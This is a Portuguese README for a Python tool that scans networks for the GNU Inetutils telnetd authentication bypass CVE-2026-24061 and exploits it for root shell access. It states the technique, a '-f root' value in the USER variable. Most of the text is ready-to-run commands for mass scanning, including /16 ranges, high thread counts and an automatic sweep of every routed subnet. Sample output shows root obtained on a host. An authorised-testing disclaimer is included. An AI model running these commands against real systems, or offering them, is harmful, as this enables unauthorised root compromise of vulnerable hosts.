
Scanner baseado em Python que deteta e explora a bypass de autenticação telnetd CVE-2026-24061, permitindo acesso a uma shell root em serviços GNU Inetutils vulneráveis.
Um scanner baseado em Python para detectar e explorar a vulnerabilidade CVE-2026-24061 em serviços telnetd do GNU Inetutils. Esta ferramenta verifica endereços IP ou redes em busca de serviços telnetd vulneráveis que permitem bypass de autenticação, resultando em acesso root ao shell.
ESTE SOFTWARE É FORNECIDO APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.
Esta aplicação foi desenvolvida exclusivamente para fins educacionais para demonstrar vulnerabilidades de segurança e auxiliar em testes de segurança e pesquisas autorizados.
ESTE SOFTWARE É FORNECIDO "NO ESTADO EM QUE SE ENCONTRA", SEM GARANTIA DE QUALQUER TIPO, EXPRESSA OU IMPLÍCITA, INCLUINDO, MAS NÃO SE LIMITANDO A, GARANTIAS DE COMERCIABILIDADE, ADEQUAÇÃO A UM FIM ESPECÍFICO E NÃO VIOLAÇÃO. OS AUTORES E COLABORADORES NÃO GARANTEM QUE O SOFTWARE SERÁ LIVRE DE ERROS, SEGURO OU FUNCIONAL. O software pode conter bugs, erros ou outros defeitos.
TODA A RESPONSABILIDADE E OBRIGAÇÃO PELO USO DESTE SOFTWARE RECAI INTEGRALMENTE SOBRE O USUÁRIO. Os autores, colaboradores e distribuidores deste software não serão responsabilizados por quaisquer danos, perdas ou consequências legais resultantes do uso, uso indevido ou incapacidade de usar este software.
Esta ferramenta deve ser usada SOMENTE em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal e pode resultar em processo criminal.
Os autores NÃO garantem:
Ao usar este software, você reconhece que leu, entendeu e concorda em ficar vinculado a estes termos. Se você não concorda, não use este software.
Desenvolvido por: Cuma KURT
E-mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: O telnetd do GNU Inetutils até a versão 2.7 permite bypass de autenticação remota por meio de um valor -f root para a variável de ambiente USER.
Pontuação CVSS: 9.8 (Crítica)
Referência: NVD CVE-2026-24061
telnet (geralmente pré-instalado em Linux/macOS)pip3 install -r requirements.txt
Nota: A maioria das dependências faz parte da biblioteca padrão do Python. A ferramenta funciona imediatamente com Python 3.6+.
# Verificar um único endereço IP
python3 tscan.py 192.168.1.1
# Verificar uma rede CIDR
python3 tscan.py 192.168.1.0/24
# Verificar com porta personalizada
python3 tscan.py -p 2323 192.168.1.1
# Verificar alvos de um arquivo
python3 tscan.py targets.txt
# Verificar múltiplos endereços IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# Verificar múltiplas redes CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# Aumentar o número de threads para varredura mais rápida (100 threads)
python3 tscan.py -t 100 192.168.1.0/24
# Aumentar o timeout para redes lentas
python3 tscan.py --timeout 10 192.168.1.0/24
# Combinar ambos para varreduras de redes grandes
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# Detectar e verificar automaticamente todas as sub-redes da tabela de roteamento do sistema
python3 tscan.py --auto
# ou use a forma abreviada:
python3 tscan.py -a
# Detecção automática com porta personalizada
python3 tscan.py --auto -p 2323
# ou:
python3 tscan.py -a -p 2323
# Detecção automática com alto número de threads
python3 tscan.py --auto -t 200
# ou:
python3 tscan.py -a -t 200
Nota: O modo --auto lê a tabela de roteamento do sistema usando o comando ip route list ou route -n e verifica automaticamente todas as sub-redes detectadas.
# Exemplo 1: Varredura rápida da rede local
python3 tscan.py 192.168.1.0/24
# Exemplo 2: Varredura rápida com alta concorrência
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# Exemplo 3: Verificar porta telnet não padrão
python3 tscan.py -p 2323 192.168.1.0/24
# Exemplo 4: Detectar e verificar automaticamente todas as sub-redes da rede local
python3 tscan.py --auto
# ou:
python3 tscan.py -a
# Exemplo 5: Detecção automática com configurações personalizadas
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# ou:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
argumentos posicionais:
targets Endereço(s) IP, rede(s) CIDR ou caminho(s) de arquivo(s) contendo alvos
opções:
-h, --help Mostra esta mensagem de ajuda e sai
-p, --port PORT Porta telnet para verificar (padrão: 23)
-t, --threads THREADS Número de threads concorrentes (padrão: 50)
--timeout TIMEOUT Timeout de conexão em segundos (padrão: 5)
-v, --verbose Saída detalhada
-a, --auto Detecta e verifica automaticamente todas as sub-redes da tabela de roteamento do sistema (route -n ou ip route list)
Crie um arquivo de texto com um alvo por linha:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
Linhas que começam com # são tratadas como comentários e ignoradas.
A ferramenta fornece:
Progresso em Tempo Real: Mostra os resultados à medida que são descobertos
[!] - Host vulnerável[~] - Porta aberta, mas não vulnerávelRelatório Resumido: Inclui:
[*] Iniciando varredura em 256 alvo(s)...
[*] Porta: 23, Threads: 50, Timeout: 5s
[*] Progresso: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Abertas: 2 | Vulneráveis: 1
[!] 192.168.1.100:23 - VULNERÁVEL
[*] Progresso: [████████████████████████████████████] 100.0% (256/256) | Abertas: 3 | Vulneráveis: 1
[+] Varredura concluída: 256/256 alvos verificados
======================================================================
Resumo dos Resultados da Varredura
======================================================================
Serviços telnet encontrados: 3
Hosts vulneráveis: 1
[!] HOSTS VULNERÁVEIS:
● 192.168.1.100:23
Saída: uid=0(root) gid=0(root) groups=0(root)...
[~] Serviços telnet encontrados, mas não vulneráveis:
● 192.168.1.101:23
● 192.168.1.102:23
[*] Varredura concluída em 12.34 segundos